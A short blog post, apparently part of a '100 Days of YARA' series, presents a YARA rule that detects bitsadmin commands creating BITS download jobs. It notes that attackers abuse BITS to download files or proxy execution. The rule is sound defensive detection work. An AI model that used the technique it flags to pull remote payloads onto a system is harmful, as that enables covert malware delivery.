We’re halfway through the 100 days! Microsoft’s Background Intelligent Transfer Service can be used to proxy execution of binaries or execute from an Alternate Data Stream, but is more commonly used maliciously to download files from an external host.
rule TTP_BITS_Download_command {
meta:
description = "Matches strings commonly found when creating new BITS download jobs."
last_modified = "2024-02-19"
author = "@petermstewart"
DaysofYara = "50/100"
ref = "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"
strings:
$a = "bitsadmin /create" nocase ascii wide
$b = "/addfile" nocase ascii wide
$c = "/complete" nocase ascii wide
$d = "http" nocase ascii wide
condition:
all of them
}
Find the rest of my 100DaysofYARA posts here, and the rules themselves on my Github repository.
Cyber Poking 